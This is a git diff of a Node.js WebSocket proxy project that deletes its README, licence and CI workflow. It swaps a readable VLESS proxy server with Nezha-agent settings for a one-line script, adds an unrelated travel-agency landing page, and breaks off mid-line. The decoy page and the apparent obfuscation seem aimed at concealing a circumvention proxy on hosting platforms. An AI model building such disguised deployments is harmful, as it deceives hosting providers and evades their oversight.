diff --git a/.github/workflows/build-image.yml b/.github/workflows/build-image.yml deleted file mode 100644 index 8bc16a5bb8..0000000000 --- a/.github/workflows/build-image.yml +++ /dev/null @@ -1,47 +0,0 @@ -name: Build and Push Docker Image - -on: - push: - branches: [ main ] - paths: - - 'Dockerfile' - - 'index.js' - - 'package.json' - pull_request: - branches: [ main ] - workflow_dispatch: - -jobs: - build: - runs-on: ubuntu-latest - permissions: - contents: read - packages: write - - steps: - - name: Checkout repository - uses: actions/checkout@v4 - - - name: Log in to GitHub Container Registry - uses: docker/login-action@v3 - with: - registry: ghcr.io - username: ${{ github.actor }} - password: ${{ secrets.GITHUB_TOKEN }} - - - name: Set up Docker Buildx - uses: docker/setup-buildx-action@v3 - - - name: Build and push Docker image - uses: docker/build-push-action@v5 - with: - context: . - push: true - tags: | - ghcr.io/${{ github.repository_owner }}/ws:latest - labels: | - org.opencontainers.image.source=https://github.com/${{ github.repository }} - org.opencontainers.image.description=Websocket Server - org.opencontainers.image.licenses=MIT - cache-from: type=gha - cache-to: type=gha,mode=max diff --git a/Dockerfile b/Dockerfile index 4351d63b1c..e9870fa0a1 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,12 +1,12 @@ -FROM node:alpine +FROM node:20-alpine3.20 -WORKDIR /app +WORKDIR /tmp -COPY . . +COPY index.js index.html package.json ./ -EXPOSE 3000 +EXPOSE 7860 -RUN apk update && apk add --no-cache openssl curl &&\ +RUN apk update && apk add --no-cache bash openssl curl &&\ chmod +x index.js &&\ npm install diff --git a/LICENSE b/LICENSE deleted file mode 100644 index f288702d2f..0000000000 --- a/LICENSE +++ /dev/null @@ -1,674 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The GNU General Public License is a free, copyleft license for -software and other kinds of works. - - The licenses for most software and other practical works are designed -to take away your freedom to share and change the works. By contrast, -the GNU General Public License is intended to guarantee your freedom to -share and change all versions of a program--to make sure it remains free -software for all its users. We, the Free Software Foundation, use the -GNU General Public License for most of our software; it applies also to -any other work released this way by its authors. You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -them if you wish), that you receive source code or can get it if you -want it, that you can change the software or use pieces of it in new -free programs, and that you know you can do these things. - - To protect your rights, we need to prevent others from denying you -these rights or asking you to surrender the rights. Therefore, you have -certain responsibilities if you distribute copies of the software, or if -you modify it: responsibilities to respect the freedom of others. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must pass on to the recipients the same -freedoms that you received. You must make sure that they, too, receive -or can get the source code. And you must show them these terms so they -know their rights. - - Developers that use the GNU GPL protect your rights with two steps: -(1) assert copyright on the software, and (2) offer you this License -giving you legal permission to copy, distribute and/or modify it. - - For the developers' and authors' protection, the GPL clearly explains -that there is no warranty for this free software. For both users' and -authors' sake, the GPL requires that modified versions be marked as -changed, so that their problems will not be attributed erroneously to -authors of previous versions. - - Some devices are designed to deny users access to install or run -modified versions of the software inside them, although the manufacturer -can do so. This is fundamentally incompatible with the aim of -protecting users' freedom to change the software. The systematic -pattern of such abuse occurs in the area of products for individuals to -use, which is precisely where it is most unacceptable. Therefore, we -have designed this version of the GPL to prohibit the practice for those -products. If such problems arise substantially in other domains, we -stand ready to extend this provision to those domains in future versions -of the GPL, as needed to protect the freedom of users. - - Finally, every program is threatened constantly by software patents. -States should not allow patents to restrict development and use of -software on general-purpose computers, but in those that do, we wish to -avoid the special danger that patents applied to a free program could -make it effectively proprietary. To prevent this, the GPL assures that -patents cannot be used to render the program non-free. - - The precise terms and conditions for copying, distribution and -modification follow. - - TERMS AND CONDITIONS - - 0. Definitions. - - "This License" refers to version 3 of the GNU General Public License. - - "Copyright" also means copyright-like laws that apply to other kinds of -works, such as semiconductor masks. - - "The Program" refers to any copyrightable work licensed under this -License. Each licensee is addressed as "you". "Licensees" and -"recipients" may be individuals or organizations. - - To "modify" a work means to copy from or adapt all or part of the work -in a fashion requiring copyright permission, other than the making of an -exact copy. The resulting work is called a "modified version" of the -earlier work or a work "based on" the earlier work. - - A "covered work" means either the unmodified Program or a work based -on the Program. - - To "propagate" a work means to do anything with it that, without -permission, would make you directly or secondarily liable for -infringement under applicable copyright law, except executing it on a -computer or modifying a private copy. Propagation includes copying, -distribution (with or without modification), making available to the -public, and in some countries other activities as well. - - To "convey" a work means any kind of propagation that enables other -parties to make or receive copies. Mere interaction with a user through -a computer network, with no transfer of a copy, is not conveying. - - An interactive user interface displays "Appropriate Legal Notices" -to the extent that it includes a convenient and prominently visible -feature that (1) displays an appropriate copyright notice, and (2) -tells the user that there is no warranty for the work (except to the -extent that warranties are provided), that licensees may convey the -work under this License, and how to view a copy of this License. If -the interface presents a list of user commands or options, such as a -menu, a prominent item in the list meets this criterion. - - 1. Source Code. - - The "source code" for a work means the preferred form of the work -for making modifications to it. "Object code" means any non-source -form of a work. - - A "Standard Interface" means an interface that either is an official -standard defined by a recognized standards body, or, in the case of -interfaces specified for a particular programming language, one that -is widely used among developers working in that language. - - The "System Libraries" of an executable work include anything, other -than the work as a whole, that (a) is included in the normal form of -packaging a Major Component, but which is not part of that Major -Component, and (b) serves only to enable use of the work with that -Major Component, or to implement a Standard Interface for which an -implementation is available to the public in source code form. A -"Major Component", in this context, means a major essential component -(kernel, window system, and so on) of the specific operating system -(if any) on which the executable work runs, or a compiler used to -produce the work, or an object code interpreter used to run it. - - The "Corresponding Source" for a work in object code form means all -the source code needed to generate, install, and (for an executable -work) run the object code and to modify the work, including scripts to -control those activities. However, it does not include the work's -System Libraries, or general-purpose tools or generally available free -programs which are used unmodified in performing those activities but -which are not part of the work. For example, Corresponding Source -includes interface definition files associated with source files for -the work, and the source code for shared libraries and dynamically -linked subprograms that the work is specifically designed to require, -such as by intimate data communication or control flow between those -subprograms and other parts of the work. - - The Corresponding Source need not include anything that users -can regenerate automatically from other parts of the Corresponding -Source. - - The Corresponding Source for a work in source code form is that -same work. - - 2. Basic Permissions. - - All rights granted under this License are granted for the term of -copyright on the Program, and are irrevocable provided the stated -conditions are met. This License explicitly affirms your unlimited -permission to run the unmodified Program. The output from running a -covered work is covered by this License only if the output, given its -content, constitutes a covered work. This License acknowledges your -rights of fair use or other equivalent, as provided by copyright law. - - You may make, run and propagate covered works that you do not -convey, without conditions so long as your license otherwise remains -in force. You may convey covered works to others for the sole purpose -of having them make modifications exclusively for you, or provide you -with facilities for running those works, provided that you comply with -the terms of this License in conveying all material for which you do -not control copyright. Those thus making or running the covered works -for you must do so exclusively on your behalf, under your direction -and control, on terms that prohibit them from making any copies of -your copyrighted material outside their relationship with you. - - Conveying under any other circumstances is permitted solely under -the conditions stated below. Sublicensing is not allowed; section 10 -makes it unnecessary. - - 3. Protecting Users' Legal Rights From Anti-Circumvention Law. - - No covered work shall be deemed part of an effective technological -measure under any applicable law fulfilling obligations under article -11 of the WIPO copyright treaty adopted on 20 December 1996, or -similar laws prohibiting or restricting circumvention of such -measures. - - When you convey a covered work, you waive any legal power to forbid -circumvention of technological measures to the extent such circumvention -is effected by exercising rights under this License with respect to -the covered work, and you disclaim any intention to limit operation or -modification of the work as a means of enforcing, against the work's -users, your or third parties' legal rights to forbid circumvention of -technological measures. - - 4. Conveying Verbatim Copies. - - You may convey verbatim copies of the Program's source code as you -receive it, in any medium, provided that you conspicuously and -appropriately publish on each copy an appropriate copyright notice; -keep intact all notices stating that this License and any -non-permissive terms added in accord with section 7 apply to the code; -keep intact all notices of the absence of any warranty; and give all -recipients a copy of this License along with the Program. - - You may charge any price or no price for each copy that you convey, -and you may offer support or warranty protection for a fee. - - 5. Conveying Modified Source Versions. - - You may convey a work based on the Program, or the modifications to -produce it from the Program, in the form of source code under the -terms of section 4, provided that you also meet all of these conditions: - - a) The work must carry prominent notices stating that you modified - it, and giving a relevant date. - - b) The work must carry prominent notices stating that it is - released under this License and any conditions added under section - 7. This requirement modifies the requirement in section 4 to - "keep intact all notices". - - c) You must license the entire work, as a whole, under this - License to anyone who comes into possession of a copy. This - License will therefore apply, along with any applicable section 7 - additional terms, to the whole of the work, and all its parts, - regardless of how they are packaged. This License gives no - permission to license the work in any other way, but it does not - invalidate such permission if you have separately received it. - - d) If the work has interactive user interfaces, each must display - Appropriate Legal Notices; however, if the Program has interactive - interfaces that do not display Appropriate Legal Notices, your - work need not make them do so. - - A compilation of a covered work with other separate and independent -works, which are not by their nature extensions of the covered work, -and which are not combined with it such as to form a larger program, -in or on a volume of a storage or distribution medium, is called an -"aggregate" if the compilation and its resulting copyright are not -used to limit the access or legal rights of the compilation's users -beyond what the individual works permit. Inclusion of a covered work -in an aggregate does not cause this License to apply to the other -parts of the aggregate. - - 6. Conveying Non-Source Forms. - - You may convey a covered work in object code form under the terms -of sections 4 and 5, provided that you also convey the -machine-readable Corresponding Source under the terms of this License, -in one of these ways: - - a) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by the - Corresponding Source fixed on a durable physical medium - customarily used for software interchange. - - b) Convey the object code in, or embodied in, a physical product - (including a physical distribution medium), accompanied by a - written offer, valid for at least three years and valid for as - long as you offer spare parts or customer support for that product - model, to give anyone who possesses the object code either (1) a - copy of the Corresponding Source for all the software in the - product that is covered by this License, on a durable physical - medium customarily used for software interchange, for a price no - more than your reasonable cost of physically performing this - conveying of source, or (2) access to copy the - Corresponding Source from a network server at no charge. - - c) Convey individual copies of the object code with a copy of the - written offer to provide the Corresponding Source. This - alternative is allowed only occasionally and noncommercially, and - only if you received the object code with such an offer, in accord - with subsection 6b. - - d) Convey the object code by offering access from a designated - place (gratis or for a charge), and offer equivalent access to the - Corresponding Source in the same way through the same place at no - further charge. You need not require recipients to copy the - Corresponding Source along with the object code. If the place to - copy the object code is a network server, the Corresponding Source - may be on a different server (operated by you or a third party) - that supports equivalent copying facilities, provided you maintain - clear directions next to the object code saying where to find the - Corresponding Source. Regardless of what server hosts the - Corresponding Source, you remain obligated to ensure that it is - available for as long as needed to satisfy these requirements. - - e) Convey the object code using peer-to-peer transmission, provided - you inform other peers where the object code and Corresponding - Source of the work are being offered to the general public at no - charge under subsection 6d. - - A separable portion of the object code, whose source code is excluded -from the Corresponding Source as a System Library, need not be -included in conveying the object code work. - - A "User Product" is either (1) a "consumer product", which means any -tangible personal property which is normally used for personal, family, -or household purposes, or (2) anything designed or sold for incorporation -into a dwelling. In determining whether a product is a consumer product, -doubtful cases shall be resolved in favor of coverage. For a particular -product received by a particular user, "normally used" refers to a -typical or common use of that class of product, regardless of the status -of the particular user or of the way in which the particular user -actually uses, or expects or is expected to use, the product. A product -is a consumer product regardless of whether the product has substantial -commercial, industrial or non-consumer uses, unless such uses represent -the only significant mode of use of the product. - - "Installation Information" for a User Product means any methods, -procedures, authorization keys, or other information required to install -and execute modified versions of a covered work in that User Product from -a modified version of its Corresponding Source. The information must -suffice to ensure that the continued functioning of the modified object -code is in no case prevented or interfered with solely because -modification has been made. - - If you convey an object code work under this section in, or with, or -specifically for use in, a User Product, and the conveying occurs as -part of a transaction in which the right of possession and use of the -User Product is transferred to the recipient in perpetuity or for a -fixed term (regardless of how the transaction is characterized), the -Corresponding Source conveyed under this section must be accompanied -by the Installation Information. But this requirement does not apply -if neither you nor any third party retains the ability to install -modified object code on the User Product (for example, the work has -been installed in ROM). - - The requirement to provide Installation Information does not include a -requirement to continue to provide support service, warranty, or updates -for a work that has been modified or installed by the recipient, or for -the User Product in which it has been modified or installed. Access to a -network may be denied when the modification itself materially and -adversely affects the operation of the network or violates the rules and -protocols for communication across the network. - - Corresponding Source conveyed, and Installation Information provided, -in accord with this section must be in a format that is publicly -documented (and with an implementation available to the public in -source code form), and must require no special password or key for -unpacking, reading or copying. - - 7. Additional Terms. - - "Additional permissions" are terms that supplement the terms of this -License by making exceptions from one or more of its conditions. -Additional permissions that are applicable to the entire Program shall -be treated as though they were included in this License, to the extent -that they are valid under applicable law. If additional permissions -apply only to part of the Program, that part may be used separately -under those permissions, but the entire Program remains governed by -this License without regard to the additional permissions. - - When you convey a copy of a covered work, you may at your option -remove any additional permissions from that copy, or from any part of -it. (Additional permissions may be written to require their own -removal in certain cases when you modify the work.) You may place -additional permissions on material, added by you to a covered work, -for which you have or can give appropriate copyright permission. - - Notwithstanding any other provision of this License, for material you -add to a covered work, you may (if authorized by the copyright holders of -that material) supplement the terms of this License with terms: - - a) Disclaiming warranty or limiting liability differently from the - terms of sections 15 and 16 of this License; or - - b) Requiring preservation of specified reasonable legal notices or - author attributions in that material or in the Appropriate Legal - Notices displayed by works containing it; or - - c) Prohibiting misrepresentation of the origin of that material, or - requiring that modified versions of such material be marked in - reasonable ways as different from the original version; or - - d) Limiting the use for publicity purposes of names of licensors or - authors of the material; or - - e) Declining to grant rights under trademark law for use of some - trade names, trademarks, or service marks; or - - f) Requiring indemnification of licensors and authors of that - material by anyone who conveys the material (or modified versions of - it) with contractual assumptions of liability to the recipient, for - any liability that these contractual assumptions directly impose on - those licensors and authors. - - All other non-permissive additional terms are considered "further -restrictions" within the meaning of section 10. If the Program as you -received it, or any part of it, contains a notice stating that it is -governed by this License along with a term that is a further -restriction, you may remove that term. If a license document contains -a further restriction but permits relicensing or conveying under this -License, you may add to a covered work material governed by the terms -of that license document, provided that the further restriction does -not survive such relicensing or conveying. - - If you add terms to a covered work in accord with this section, you -must place, in the relevant source files, a statement of the -additional terms that apply to those files, or a notice indicating -where to find the applicable terms. - - Additional terms, permissive or non-permissive, may be stated in the -form of a separately written license, or stated as exceptions; -the above requirements apply either way. - - 8. Termination. - - You may not propagate or modify a covered work except as expressly -provided under this License. Any attempt otherwise to propagate or -modify it is void, and will automatically terminate your rights under -this License (including any patent licenses granted under the third -paragraph of section 11). - - However, if you cease all violation of this License, then your -license from a particular copyright holder is reinstated (a) -provisionally, unless and until the copyright holder explicitly and -finally terminates your license, and (b) permanently, if the copyright -holder fails to notify you of the violation by some reasonable means -prior to 60 days after the cessation. - - Moreover, your license from a particular copyright holder is -reinstated permanently if the copyright holder notifies you of the -violation by some reasonable means, this is the first time you have -received notice of violation of this License (for any work) from that -copyright holder, and you cure the violation prior to 30 days after -your receipt of the notice. - - Termination of your rights under this section does not terminate the -licenses of parties who have received copies or rights from you under -this License. If your rights have been terminated and not permanently -reinstated, you do not qualify to receive new licenses for the same -material under section 10. - - 9. Acceptance Not Required for Having Copies. - - You are not required to accept this License in order to receive or -run a copy of the Program. Ancillary propagation of a covered work -occurring solely as a consequence of using peer-to-peer transmission -to receive a copy likewise does not require acceptance. However, -nothing other than this License grants you permission to propagate or -modify any covered work. These actions infringe copyright if you do -not accept this License. Therefore, by modifying or propagating a -covered work, you indicate your acceptance of this License to do so. - - 10. Automatic Licensing of Downstream Recipients. - - Each time you convey a covered work, the recipient automatically -receives a license from the original licensors, to run, modify and -propagate that work, subject to this License. You are not responsible -for enforcing compliance by third parties with this License. - - An "entity transaction" is a transaction transferring control of an -organization, or substantially all assets of one, or subdividing an -organization, or merging organizations. If propagation of a covered -work results from an entity transaction, each party to that -transaction who receives a copy of the work also receives whatever -licenses to the work the party's predecessor in interest had or could -give under the previous paragraph, plus a right to possession of the -Corresponding Source of the work from the predecessor in interest, if -the predecessor has it or can get it with reasonable efforts. - - You may not impose any further restrictions on the exercise of the -rights granted or affirmed under this License. For example, you may -not impose a license fee, royalty, or other charge for exercise of -rights granted under this License, and you may not initiate litigation -(including a cross-claim or counterclaim in a lawsuit) alleging that -any patent claim is infringed by making, using, selling, offering for -sale, or importing the Program or any portion of it. - - 11. Patents. - - A "contributor" is a copyright holder who authorizes use under this -License of the Program or a work on which the Program is based. The -work thus licensed is called the contributor's "contributor version". - - A contributor's "essential patent claims" are all patent claims -owned or controlled by the contributor, whether already acquired or -hereafter acquired, that would be infringed by some manner, permitted -by this License, of making, using, or selling its contributor version, -but do not include claims that would be infringed only as a -consequence of further modification of the contributor version. For -purposes of this definition, "control" includes the right to grant -patent sublicenses in a manner consistent with the requirements of -this License. - - Each contributor grants you a non-exclusive, worldwide, royalty-free -patent license under the contributor's essential patent claims, to -make, use, sell, offer for sale, import and otherwise run, modify and -propagate the contents of its contributor version. - - In the following three paragraphs, a "patent license" is any express -agreement or commitment, however denominated, not to enforce a patent -(such as an express permission to practice a patent or covenant not to -sue for patent infringement). To "grant" such a patent license to a -party means to make such an agreement or commitment not to enforce a -patent against the party. - - If you convey a covered work, knowingly relying on a patent license, -and the Corresponding Source of the work is not available for anyone -to copy, free of charge and under the terms of this License, through a -publicly available network server or other readily accessible means, -then you must either (1) cause the Corresponding Source to be so -available, or (2) arrange to deprive yourself of the benefit of the -patent license for this particular work, or (3) arrange, in a manner -consistent with the requirements of this License, to extend the patent -license to downstream recipients. "Knowingly relying" means you have -actual knowledge that, but for the patent license, your conveying the -covered work in a country, or your recipient's use of the covered work -in a country, would infringe one or more identifiable patents in that -country that you have reason to believe are valid. - - If, pursuant to or in connection with a single transaction or -arrangement, you convey, or propagate by procuring conveyance of, a -covered work, and grant a patent license to some of the parties -receiving the covered work authorizing them to use, propagate, modify -or convey a specific copy of the covered work, then the patent license -you grant is automatically extended to all recipients of the covered -work and works based on it. - - A patent license is "discriminatory" if it does not include within -the scope of its coverage, prohibits the exercise of, or is -conditioned on the non-exercise of one or more of the rights that are -specifically granted under this License. You may not convey a covered -work if you are a party to an arrangement with a third party that is -in the business of distributing software, under which you make payment -to the third party based on the extent of your activity of conveying -the work, and under which the third party grants, to any of the -parties who would receive the covered work from you, a discriminatory -patent license (a) in connection with copies of the covered work -conveyed by you (or copies made from those copies), or (b) primarily -for and in connection with specific products or compilations that -contain the covered work, unless you entered into that arrangement, -or that patent license was granted, prior to 28 March 2007. - - Nothing in this License shall be construed as excluding or limiting -any implied license or other defenses to infringement that may -otherwise be available to you under applicable patent law. - - 12. No Surrender of Others' Freedom. - - If conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot convey a -covered work so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you may -not convey it at all. For example, if you agree to terms that obligate you -to collect a royalty for further conveying from those to whom you convey -the Program, the only way you could satisfy both those terms and this -License would be to refrain entirely from conveying the Program. - - 13. Use with the GNU Affero General Public License. - - Notwithstanding any other provision of this License, you have -permission to link or combine any covered work with a work licensed -under version 3 of the GNU Affero General Public License into a single -combined work, and to convey the resulting work. The terms of this -License will continue to apply to the part which is the covered work, -but the special requirements of the GNU Affero General Public License, -section 13, concerning interaction through a network will apply to the -combination as such. - - 14. Revised Versions of this License. - - The Free Software Foundation may publish revised and/or new versions of -the GNU General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - - Each version is given a distinguishing version number. If the -Program specifies that a certain numbered version of the GNU General -Public License "or any later version" applies to it, you have the -option of following the terms and conditions either of that numbered -version or of any later version published by the Free Software -Foundation. If the Program does not specify a version number of the -GNU General Public License, you may choose any version ever published -by the Free Software Foundation. - - If the Program specifies that a proxy can decide which future -versions of the GNU General Public License can be used, that proxy's -public statement of acceptance of a version permanently authorizes you -to choose that version for the Program. - - Later license versions may give you additional or different -permissions. However, no additional obligations are imposed on any -author or copyright holder as a result of your choosing to follow a -later version. - - 15. Disclaimer of Warranty. - - THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY -APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT -HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY -OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, -THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR -PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM -IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF -ALL NECESSARY SERVICING, REPAIR OR CORRECTION. - - 16. Limitation of Liability. - - IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS -THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY -GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE -USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF -DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD -PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), -EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF -SUCH DAMAGES. - - 17. Interpretation of Sections 15 and 16. - - If the disclaimer of warranty and limitation of liability provided -above cannot be given local legal effect according to their terms, -reviewing courts shall apply local law that most closely approximates -an absolute waiver of all civil liability in connection with the -Program, unless a warranty or assumption of liability accompanies a -copy of the Program in return for a fee. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -state the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - -Also add information on how to contact you by electronic and paper mail. - - If the program does terminal interaction, make it output a short -notice like this when it starts in an interactive mode: - - Copyright (C) - This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, your program's commands -might be different; for a GUI interface, you would use an "about box". - - You should also get your employer (if you work as a programmer) or school, -if any, to sign a "copyright disclaimer" for the program, if necessary. -For more information on this, and how to apply and follow the GNU GPL, see -. - - The GNU General Public License does not permit incorporating your program -into proprietary programs. If your program is a subroutine library, you -may consider it more useful to permit linking proprietary applications with -the library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. But first, please read -. diff --git a/README.md b/README.md deleted file mode 100644 index d741779c2f..0000000000 --- a/README.md +++ /dev/null @@ -1,42 +0,0 @@ -## Node-ws说明 - -## [web-hosting部署指南](https://github.com/eooce/node-ws/blob/main/web-hosting.md) (适用于所有带nodejs App功能DirectAdmin面板) - -* 用于node环境的玩具和容器,基于node三方ws库,集成哪吒探针服务,可自行添加环境变量 - -* PaaS 平台设置的环境变量 - | 变量名 | 是否必须 | 默认值 | 备注 | - | ------------ | ------ | ------ | ------ | - | UUID | 否 |de04add9-5c68-6bab-950c-08cd5320df33| 开启了哪吒v1,请修改UUID| - | PORT | 否 | 3000 | 监听端口 | - | NEZHA_SERVER | 否 | |哪吒v1填写形式:nz.abc.com:8008 哪吒v0填写形式:nz.abc.com| - | NEZHA_PORT | 否 | | 哪吒v1没有此变量,v0的agent端口| - | NEZHA_KEY | 否 | | 哪吒v1的NZ_CLIENT_SECRET或v0的agent端口 | - | NAME | 否 | | 节点名称前缀,例如:Glitch | - | DOMAIN | 是 | | 项目分配的域名或已反代的域名,不包括https://前缀 | - | SUB_PATH | 否 | sub | 订阅路径 | - | AUTO_ACCESS | 否 | false | 是否开启自动访问保活,false为关闭,true为开启,需同时填写DOMAIN变量 | - -* 域名/sub查看节点信息,也是订阅地址,包含 https:// 或 http:// 前缀,非标端口,域名:端口/sub - - -* 温馨提示:READAME.md为说明文件,请不要上传。 -* js混肴地址:https://obfuscator.io - - -## 开源协议说明(基于GPL) - -本项目遵循 GNU 通用公共许可证(GNU General Public License, 简称 GPL)发布,并附加以下说明: - -1. 你可以自由地使用、复制、修改和分发本项目的源代码,前提是你必须保留原作者的信息及本协议内容; -2. 修改后的版本也必须以相同协议开源; -3. **未经原作者明确授权,不得将本项目或其任何部分用于商业用途。** - -商业用途包括但不限于: -- 将本项目嵌入到出售的软件、系统或服务中; -- 通过本项目直接或间接获利(例如通过广告、SaaS服务等); -- 在公司或组织内部作为商业工具使用。 - -如需获得商业授权,请联系原作者:[admin@eooce.com] - -版权所有 ©2025 `eooce` diff --git a/index.html b/index.html new file mode 100644 index 0000000000..ac253c96d3 --- /dev/null +++ b/index.html @@ -0,0 +1,770 @@ + + + + + + 探索世界 | 足迹旅行 - 发现自然与人文之美 + + + + + +
+ +
+ + +
+
+

奔赴山海,自由与热爱

+

从雨林秘镜到极光冰川,从千年古镇到蔚蓝海岸,每一次出发都是与地球的深度对话。

+ 开启旅程 +
+
+ + +
+
+
+

旅行·新生

+

不止于观光,而是负责任的探索,让美景永续留存。

+
+
+
+ 远足山川 +
+
+

重新定义可持续旅行

+

「足迹旅行」诞生于对自然的热爱,我们联合全球生态向导与本地社区,打造低碳且深度的路线。过去5年,我们支持了超过200个生态修复项目,让旅行成为守护地球的力量。

+

每一段旅程我们都遵循“不留痕”原则,鼓励公共交通、环保住宿,并链接当地文化传承人,带给你独一无二的体验。

+ 了解我们的故事 +
+
+ +
+
+ +

0

+

快乐旅客

+
+
+ +

0

+

生态线路

+
+
+ +

0

+

国家和地区

+
+
+ +

0

+

公益贡献(吨碳抵消)

+
+
+
+
+ + +
+
+
+

心之所向 · 行之所往

+

从热门秘境到遗世独立,挑选你的下一站奇遇。

+
+
+
+
+ 挪威峡湾 +
+
+

挪威·奇迹石

+

斯塔万格 | 悬空勇者之石

+

徒步三大奇石,俯瞰吕瑟峡湾,感受心跳与自然共鸣。

+ ¥ 9,800 起 +
+
+
+
+ 冰岛极光 +
+
+

冰岛·极光秘境

+

黄金圈 + 黑沙滩

+

冬季限定追寻欧若拉,冰川徒步,蓝湖温泉治愈之旅。

+ ¥ 12,600 起 +
+
+
+
+ 巴厘岛梯田 +
+
+

巴厘岛·众神之岛

+

乌布 & 佩尼达岛

+

稻田瑜伽,悬崖精灵沙滩,感受印尼传统文化与海风。

+ ¥ 5,680 起 +
+
+
+
+ 秘鲁马丘比丘 +
+
+

秘鲁·失落之城

+

库斯科 & 马丘比丘

+

穿越印加古道,安第斯山脉云雾缭绕,揭开神秘文明。

+ ¥ 18,200 起 +
+
+
+
+ 新西兰南岛 +
+
+

新西兰·星空露营

+

特卡波湖 / 霍比屯

+

暗夜保护区观星,极限运动与纯净风光并存。

+ ¥ 11,999 起 +
+
+
+
+ 坦桑尼亚 safari +
+
+

坦桑尼亚 · 狂野非洲

+

塞伦盖蒂大迁徙

+

Safari追逐动物大迁徙,恩戈罗火山口探秘。

+ ¥ 28,800 起 +
+
+
+
+
+ + +
+
+

与我们一起探索星球脉动

+

免费获取旅行灵感手册,加入社群获取独家摄影攻略与低碳旅行技巧。

+ 订阅足迹通讯 +
+
+ + + + + + + diff --git a/index.js b/index.js index df56f1da2d..2cbf48eeda 100644 --- a/index.js +++ b/index.js @@ -1,213 +1 @@ -const os = require('os'); -const http = require('http'); -const fs = require('fs'); -const axios = require('axios'); -const net = require('net'); -const { Buffer } = require('buffer'); -const { exec, execSync } = require('child_process'); -const { WebSocket, createWebSocketStream } = require('ws'); -const UUID = process.env.UUID || '5efabea4-f6d4-91fd-b8f0-17e004c89c60'; // 运行哪吒v1,在不同的平台需要改UUID,否则会被覆盖 -const NEZHA_SERVER = process.env.NEZHA_SERVER || ''; // 哪吒v1填写形式:nz.abc.com:8008 哪吒v0填写形式:nz.abc.com -const NEZHA_PORT = process.env.NEZHA_PORT || ''; // 哪吒v1没有此变量,v0的agent端口为{443,8443,2096,2087,2083,2053}其中之一时开启tls -const NEZHA_KEY = process.env.NEZHA_KEY || ''; // v1的NZ_CLIENT_SECRET或v0的agent端口 -const DOMAIN = process.env.DOMAIN || '1234.abc.com'; // 填写项目域名或已反代的域名,不带前缀,建议填已反代的域名 -const AUTO_ACCESS = process.env.AUTO_ACCESS || false; // 是否开启自动访问保活,false为关闭,true为开启,需同时填写DOMAIN变量 -const WSPATH = process.env.WSPATH || UUID.slice(0, 8); // 节点路径,默认获取uuid前8位 -const SUB_PATH = process.env.SUB_PATH || 'sub'; // 获取节点的订阅路径 -const NAME = process.env.NAME || 'Vls'; // 节点名称 -const PORT = process.env.PORT || 3000; // http和ws服务端口 - -let ISP = ''; -const GetISP = async () => { - try { - const res = await axios.get('https://speed.cloudflare.com/meta'); - const data = res.data; - ISP = `${data.country}-${data.asOrganization}`.replace(/ /g, '_'); - } catch (e) { - ISP = 'Unknown'; - } -} -GetISP(); -const httpServer = http.createServer((req, res) => { - if (req.url === '/') { - res.writeHead(200, { 'Content-Type': 'text/plain' }); - res.end('Hello, World\n'); - } else if (req.url === `/${SUB_PATH}`) { - const vlessURL = `vless://${UUID}@www.visa.com.tw:443?encryption=none&security=tls&sni=${DOMAIN}&fp=chrome&type=ws&host=${DOMAIN}&path=%2F${WSPATH}#${NAME}-${ISP}`; - const base64Content = Buffer.from(vlessURL).toString('base64'); - res.writeHead(200, { 'Content-Type': 'text/plain' }); - res.end(base64Content + '\n'); - } else { - res.writeHead(404, { 'Content-Type': 'text/plain' }); - res.end('Not Found\n'); - } -}); - -const wss = new WebSocket.Server({ server: httpServer }); -const uuid 